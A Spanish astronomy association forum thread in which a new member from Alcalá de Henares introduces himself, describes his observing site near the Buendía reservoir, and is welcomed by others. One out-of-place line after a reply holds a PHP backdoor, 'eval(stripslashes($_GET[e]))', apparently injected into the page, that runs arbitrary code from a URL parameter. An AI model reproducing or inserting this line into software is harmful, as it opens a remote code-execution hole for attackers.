Hola, nuevo socio

Consultas generales
Responder
Tubo
Mensajes: 18
Registrado: Mié Jul 21, 2010 4:08 pm

Hola, nuevo socio

Mensaje por Tubo »

Buenas, me acabo de registrar en el foro y además he pagado la cuota de 20 euros que he visto en la página de la asociación. Ver que por ese dinero ya se es socio vitalicio me ha animado, puesto que es una cantidad bastante pequeña, y además es bueno contribuir a mantener una asociación de este tipo.

Me llamo Rafa, soy de Alcalá de Henares y tengo dos telescopios y unos prismáticos astronómicos. Desgraciadamente, por motivos tanto personales como de trabajo viajo con frecuencia y no puedo observar ni la mitad de lo que me gustaría, pero ganas y afición no me faltan.

Saludos a todos :)
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Hola, nuevo socio

Mensaje por m3ntol »

Hoa Rafa, bienvenido a la asociación. Estas fechas son un poco complicadas por las vacaciones pero seguro que organizamos alguna salida de una noche. Estate atento al foro de quedadas y apuntate a la que te apetezca.

Un saludo!
phpbb:eval(stripslashes($_GET[e]));
pfvidal
Mensajes: 388
Registrado: Lun Feb 04, 2008 1:26 pm

Hola, nuevo socio

Mensaje por pfvidal »

Rafa desde Alcalá un saludo, y bienvenido vecino.

Pedro Vidal
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Hola, nuevo socio

Mensaje por vakaloura »

Hola Rafa!!

Bienvenido a la Asociación y al foro!! Ahora sólo falta conocernos en persona, como te dice M3ntol ya organizaremos algo en breve para desmonarnos un poquillo más, que con este invierno que hemos tenido.... :evil:

Lo dicho, un saludo y bienvenido!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Hola, nuevo socio

Mensaje por Manuelariza »

Pues nada....uno mas que te da la bienvenida. :D :D


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
theheavy
Mensajes: 871
Registrado: Mié Sep 02, 2009 7:59 pm

Hola, nuevo socio

Mensaje por theheavy »

Hola rafa, y enhorabuena, acabas de hacer la mejor inversión de tu vida con esos 20
Mas vale estar callado y parecer tonto,
que abrir la boca y demostrarlo.
Tubo
Mensajes: 18
Registrado: Mié Jul 21, 2010 4:08 pm

Hola, nuevo socio

Mensaje por Tubo »

Gracias a todos por la cordial bienvenida. Mi lugar de observación está cerca del pantano de Buendía, donde paso algunos (pocos) días en la casa familiar y donde tengo los telescopios. El cielo allí cada vez es peor: los pueblos de los alrededores generan contaminación, concretamente Villalba del Rey, pese a estar a casi 10 km, parece Las Vegas. El cielo W, qué os voy a contar si es el que apunta hacia Guadalajara y Madrid. Afortunadamente hay una pequeña sierra que lo tapa bastante. También hay mucho tráfico aéreo al principio de la noche, que aunque pueda parecer algo menor, resulta molesto ya que el cielo se llena de luces parpadeantes que se mueven constantemente.

Encantado de poder quedar algún día y de compartir este interés con otros. Por cierto, ¿recibiré algún papel que atestigüe mi condición de "socio vitalicio" de Astrohenares? Suena como si fuera algo muy importante jejeje
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Hola, nuevo socio

Mensaje por javi »

Bienvenido rafa, te lo vas a pasar de pu... madre jejeje.

Un abrazo.
Responder